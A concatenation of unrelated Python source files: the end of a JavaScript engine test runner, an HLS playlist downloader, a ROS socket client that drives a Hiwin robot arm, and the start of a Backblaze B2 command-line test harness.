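# hypothetical, not taken from a real status file):
#
#   prefix simple
#   def FLAKY = PASS || FAIL
#   [ $mode == debug ]
#   test-http-* : FLAKY
#
# A "[...]" header opens a section guarded by a condition, "prefix" prepends a
# path component to subsequent rule paths, "def" names a reusable outcome
# expression, and "path : value" rules assign expected outcomes to tests.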
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=True, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("-r", "--repeat", help="Repeat count for each test",
default=1, type="int")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--use-http1", help="Pass --use-http1 switch to node",
default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("--jxpath", help="Path for jx binary file to be tested (if different than default)")
result.add_option("--nt", help="Does not truncate the name of currently tested file", default=False)
result.add_option("--no-truncate", help="Does not truncate the name of currently tested file", default=False)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
global NO_TRUNCATE
NO_TRUNCATE = options.no_truncate or options.nt
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
if ARCH_GUESS == None:
options.arch = ""
else:
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
if options.snapshot:
options.scons_flags.append("snapshot=on")
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
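# Illustrative sketch (the selector string is hypothetical): SplitPath turns a
# slash-separated test selector into Pattern objects, where '*' acts as a
# wildcard within a single path component.
def ExampleSplitPath():
  patterns = SplitPath('simple/test-http-*')
  # patterns[0] matches 'simple'; patterns[1] matches names such as 'test-http-client'
  return bool(patterns[0].match('simple')) and bool(patterns[1].match('test-http-client'))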
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = ['simple', 'pummel', 'message', 'internet', 'gc']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
if options.use_http1:
def wrap(processor):
return lambda args: processor(args[:1] + ['--use-http1'] + args[1:])
processor = wrap(processor)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
if not exists(context.GetVm(mode)):
print "Can't find shell executable: '%s'" % context.GetVm(mode)
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator
}
test_list = root.ListTests([], path, context, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
return SKIP in case.outcomes or SLOW in case.outcomes
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 0
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
hpd.py
|
#!/usr/bin/env python3
#
# Modified from:
# https://gist.github.com/anonymouss/5293c2421b4236fc1a38705fefd4f2e7
#
# Http Live Streaming -- fetcher/downloader
# A simple script to download segments/m3u8 files from given url, including
# variants and alternative renditions.
#
# TODO
# * BYTERANGE (multiple segments per file)
# * Absolute URIs - Would have to modify playlist
# * Additional HTTP headers - If needed
import argparse
import logging
import os
import threading
import urllib.error
import urllib.parse
import urllib.request
_auth_header = ""
_bytes_downloaded = 0
_bytes_total = 0
_counter_lock = threading.Lock()
_fetched_dict = dict()
_files_downloaded = 0
_files_total = 0
_max_concurrent_downloads = 10
_out_dir = ""
_threads = list()
_threads_lock = threading.Lock()
def fetch(url: tuple, out_dir: str) -> None:
global _bytes_total
global _fetched_dict
global _files_total
if not os.path.exists(out_dir):
try:
os.makedirs(out_dir)
except Exception as e:
logging.debug(f"Failed to make directory {out_dir}: {e}")
is_playlist, _ = is_playlist_url(url)
filename = os.path.basename(url.path)
out_path = os.path.join(out_dir, filename)
with _counter_lock:
if out_path in _fetched_dict:
logging.debug(f"Skipping {out_path} (already fetched)")
return
else:
_fetched_dict[out_path] = True
if os.path.exists(out_path) and not is_playlist:
logging.debug(f"Skipping {out_path} (already exists)")
with _counter_lock:
_bytes_total += os.path.getsize(out_path)
_files_total += 1
else:
if is_playlist:
logging.info(f"Downloading playlist to {out_path}")
else:
logging.debug(f"Downloading to {out_path}")
data = read_data_from_url(url)
if data is None:
logging.info(f"Unable to download file {url.geturl()}")
return
write_file(out_path, data)
if is_playlist:
parse_playlist(url, out_dir, data)
def fetch_threaded(url: tuple, out_dir: str) -> None:
global _threads
t = None
while True:
with _threads_lock:
if len(_threads) < _max_concurrent_downloads:
t = threading.Thread(target=fetch, args=(url, out_dir))
_threads.append(t)
t.start()
return
else:
t = _threads.pop(0)
t.join()
def fetch_uri_in_playlist(uri: bytes, playlist_url: tuple, playlist_out_dir: str) -> None:
uri = uri.strip().strip(b'"').decode()
url_path = urllib.parse.urlparse(uri)
if len(url_path.scheme) != 0:
logging.warning(f"Only relative URIs supported, skipping {uri}")
return
playlist_dir = os.path.dirname(playlist_url.path)
out_dir = os.path.normpath(os.path.join(playlist_out_dir, os.path.dirname(url_path.path.replace("../", ""))))
path = os.path.normpath(os.path.join(playlist_dir, url_path.path))
url_path = urllib.parse.ParseResult(
playlist_url.scheme, playlist_url.netloc, path, "", url_path.query, ""
)
if is_playlist_url(url_path)[0]:
fetch(url_path, out_dir)
else:
fetch_threaded(url_path, out_dir)
def is_playlist_url(url: tuple) -> tuple:
if len(url.path) == 0:
return False, "Empty url"
elif not (url.scheme == "http" or url.scheme == "https"):
return False, "Missing http/https scheme"
elif os.path.splitext(url.path)[1].lower() != ".m3u8":
return False, "Extension is not m3u8"
else:
return True, None
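# Illustrative sketch (hypothetical URL, not part of the original script):
# is_playlist_url expects an already-parsed URL and accepts only http(s) URLs
# whose path ends in ".m3u8".
def _example_is_playlist_url() -> tuple:
    url = urllib.parse.urlparse("https://example.com/stream/master.m3u8")
    return is_playlist_url(url)  # -> (True, None)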
def parse_playlist(url: tuple, out_dir: str, content: bytes) -> None:
for line in content.splitlines():
line = line.strip()
if len(line) == 0:
continue
# tag
if line.startswith(b"#EXT"):
tag_split = line.split(b":", 1)
if len(tag_split) != 2:
continue
# attribute list
for attr in tag_split[1].split(b","):
if not attr.startswith(b"URI"):
continue
if b"BYTERANGE" in line:
break
# raise Exception(f"BYTERANGE not supported: {line}")
attr_split = attr.split(b"=", 1)
if len(attr_split) != 2:
break
fetch_uri_in_playlist(attr_split[1], url, out_dir)
break
continue
# comment
if line.startswith(b"#"):
continue
# URI
fetch_uri_in_playlist(line, url, out_dir)
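# Illustrative sketch (hypothetical URL and playlist text, not part of the original
# script): parse_playlist walks the playlist line by line and fetches URIs found
# either inside tag attribute lists (URI="...") or on plain URI lines. Calling it
# would attempt real downloads.
def _example_parse_playlist() -> None:
    url = urllib.parse.urlparse("https://example.com/stream/master.m3u8")
    content = b"#EXTM3U\n#EXT-X-STREAM-INF:BANDWIDTH=1280000\nvariant/low.m3u8\n"
    parse_playlist(url, "/tmp/hls-example", content)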
def read_data_from_url(url: tuple) -> bytes:
headers = {}
if len(_auth_header) > 0:
headers["authorization"] = _auth_header
request = urllib.request.Request(url=url.geturl(), headers=headers)
    # Try the request twice before giving up.
    for _ in range(2):
        try:
            response = urllib.request.urlopen(request)
            return response.read()
        except Exception as e:
            logging.debug(f"Request for {url.geturl()} failed: {e}")
    return None
def write_file(path: str, data: bytes) -> None:
global _bytes_downloaded
global _bytes_total
global _files_downloaded
global _files_total
with open(path, "wb") as file:
file.write(data)
with _counter_lock:
_bytes_downloaded += len(data)
_bytes_total += len(data)
_files_downloaded += 1
_files_total += 1
return None
def main():
global _auth_header
global _max_concurrent_downloads
global _out_dir
parser = argparse.ArgumentParser()
parser.add_argument(
"url",
help="the HLS playlist/manifest URL, e.g. https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_ts/master.m3u8",
type=str,
)
parser.add_argument(
"-a",
"--auth",
help="set a bearer token authorization header with each HTTP request",
type=str,
)
parser.add_argument("-o", "--output", help="the output directory path", type=str)
parser.add_argument(
"-t", "--threads", help="the maximum number of concurrent downloads", type=int
)
parser.add_argument("-v", "--verbose", help="verbose logging", action="store_true")
args = parser.parse_args()
url_tuple = urllib.parse.urlparse(args.url)
if args.auth:
_auth_header = "Bearer " + args.auth
if args.threads:
_max_concurrent_downloads = args.threads
if args.output:
_out_dir = os.path.abspath(args.output)
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
level=logging.DEBUG if args.verbose else logging.INFO,
datefmt="%H:%M:%S",
)
is_playlist, message = is_playlist_url(url_tuple)
if not is_playlist:
raise Exception(f"Invalid playlist URL: {url_tuple}")
# Use the "directory" name of the playlist by default
if len(_out_dir) == 0:
dirname = os.path.basename(os.path.dirname(url_tuple.path))
_out_dir = os.path.normpath(os.path.join(os.getcwd(), dirname))
logging.info(f"Using default output directory: {_out_dir}")
fetch(url_tuple, _out_dir)
logging.info(f"Waiting for {len(_threads)} threads to finish")
while True:
thread = None
with _threads_lock:
if len(_threads) == 0:
break
else:
thread = _threads.pop(0)
logging.debug(f"{len(_threads)}")
thread.join()
logging.info(
f"Done\n {_bytes_downloaded} bytes downloaded\n {_bytes_total} bytes total\n {_files_downloaded} files downloaded\n {_files_total} files total")
os.system(f"echo {_bytes_downloaded} bytes downloaded | numfmt --to=iec-i")
os.system(f"echo {_bytes_total} bytes total | numfmt --to=iec-i")
return None
if __name__ == "__main__":
main()
|
HiwinRA605_socket_ros_test_20190625184828.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and send them to the control PC over a socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial response count
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # end the generator; raising StopIteration here would become RuntimeError on Python 3.7+ (PEP 479)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
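##-----------switch usage example (illustrative only; the value below is hypothetical)----##
def _example_switch(value):
    # Mimics a C-style switch: the first matching case wins; case() with no
    # arguments acts as the default branch.
    for case in switch(value):
        if case(1):
            return 'one'
        if case(2, 3):
            return 'two or three'
        if case():  # default
            return 'other'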
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req): ## receive pose data sent from the strategy side
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm-mode data sent from the strategy side
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive speed-mode data sent from the strategy side
socket_cmd.Speedmode = int('%s'%req.Speedmode)
return(1)
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
    #start_input=int(input('Press 1 to start transmitting, 3 to quit: ')) # start command input
start_input = 1
if start_input==1:
while 1:
            ##---------------socket transmission of arm commands-----------------
            #-------select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
                #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
                #-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
                #-------set arm fast/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
            socket_cmd.action = 5 ## reset to the initial mode state
            s.send(data.encode('utf-8')) # send over the socket (encode str to bytes)
            feedback_str = s.recv(1024)
            # the arm side reports its state
            if str(feedback_str[2]) == '70':# 'F': arm is ready to receive the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
            if str(feedback_str[2]) == '84':# 'T': arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
            if str(feedback_str[2]) == '54':# '6': strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
            ##---------------socket transmission of arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
def socket_command(s):
    # Mirrors the command loop in socket_client(); expects an already-connected socket `s`.
    global Arm_feedback, data
    while 1:
        ##---------------socket transmission of arm commands-----------------
        #-------select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #-------set arm fast/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 5 ## reset to the initial mode state
        s.send(data.encode('utf-8')) # send over the socket (encode str to bytes)
        feedback_str = s.recv(1024)
        # the arm side reports its state
        if str(feedback_str[2]) == '70':# 'F': arm is ready to receive the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
        if str(feedback_str[2]) == '84':# 'T': arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
        if str(feedback_str[2]) == '54':# '6': strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
        ##---------------socket transmission of arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## reset to the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
|
test_b2_command_line.py
|
#!/usr/bin/env python2
######################################################################
#
# File: test_b2_command_line.py
#
# Copyright 2018 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
from __future__ import print_function
import hashlib
import json
import os.path
import platform
import random
import re
import shutil
import six
import subprocess
import sys
import tempfile
import threading
import unittest
from b2sdk.utils import fix_windows_path_limit
USAGE = """
This program tests the B2 command-line client.
Usages:
{command} <accountId> <applicationKey> [basic | sync_down | sync_up | sync_up_no_prefix |
keys | sync_long_path | download | account]
The optional last argument specifies which of the tests to run. If not
specified, all tests will run. Runs the b2 package in the current directory.
{command} test
Runs internal unit tests.
"""
def usage_and_exit():
print(USAGE.format(command=sys.argv[0]), file=sys.stderr)
sys.exit(1)
def error_and_exit(message):
print('ERROR:', message)
sys.exit(1)
def read_file(path):
with open(path, 'rb') as f:
return f.read()
def write_file(path, contents):
with open(path, 'wb') as f:
f.write(contents)
def file_mod_time_millis(path):
return int(os.path.getmtime(path) * 1000)
def set_file_mod_time_millis(path, time):
os.utime(path, (os.path.getatime(path), time / 1000))
def random_hex(length):
return ''.join(random.choice('0123456789abcdef') for i in six.moves.xrange(length))
class TempDir(object):
def __init__(self):
self.dirpath = None
def get_dir(self):
return self.dirpath
def __enter__(self):
self.dirpath = tempfile.mkdtemp()
return self.dirpath
def __exit__(self, exc_type, exc_val, exc_tb):
shutil.rmtree(fix_windows_path_limit(self.dirpath))
class StringReader(object):
def __init__(self):
self.string = None
def get_string(self):
return self.string
def read_from(self, f):
try:
self.string = f.read()
except Exception as e:
print(e)
self.string = str(e)
def remove_insecure_platform_warnings(text):
return os.linesep.join(
line for line in text.split(os.linesep)
if ('SNIMissingWarning' not in line) and ('InsecurePlatformWarning' not in line)
)
def run_command(path_to_script, args):
"""
    Runs the b2 command-line tool (the b2 module in the current directory) with
    the given arguments and captures its output.
    :param path_to_script: currently unused; the b2 package in the current directory is run instead
    :param args: a list of argument strings, e.g. ['list_buckets']
    :return: (status, stdout, stderr)
"""
# We'll run the b2 command-line by running the b2 module from
# the current directory. Python 2.6 doesn't support using
# '-m' with a package, so we explicitly say to run the module
# b2.__main__
os.environ['PYTHONPATH'] = '.'
os.environ['PYTHONIOENCODING'] = 'utf-8'
command = ['python', '-m', 'b2.__main__']
command.extend(args)
print('Running:', ' '.join(command))
stdout = StringReader()
stderr = StringReader()
p = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=platform.system() != 'Windows'
)
p.stdin.close()
reader1 = threading.Thread(target=stdout.read_from, args=[p.stdout])
reader1.start()
reader2 = threading.Thread(target=stderr.read_from, args=[p.stderr])
reader2.start()
p.wait()
reader1.join()
reader2.join()
stdout_decoded = remove_insecure_platform_warnings(stdout.get_string().decode('utf-8'))
stderr_decoded = remove_insecure_platform_warnings(stderr.get_string().decode('utf-8'))
print_output(p.returncode, stdout_decoded, stderr_decoded)
return p.returncode, stdout_decoded, stderr_decoded
def print_text_indented(text):
"""
Prints text that may include weird characters, indented four spaces.
"""
for line in text.split(os.linesep):
print(' ', repr(line)[1:-1])
def print_json_indented(value):
"""
Converts the value to JSON, then prints it.
"""
print_text_indented(json.dumps(value, indent=4, sort_keys=True))
def print_output(status, stdout, stderr):
print(' status:', status)
if stdout != '':
print(' stdout:')
print_text_indented(stdout)
if stderr != '':
print(' stderr:')
print_text_indented(stderr)
print()
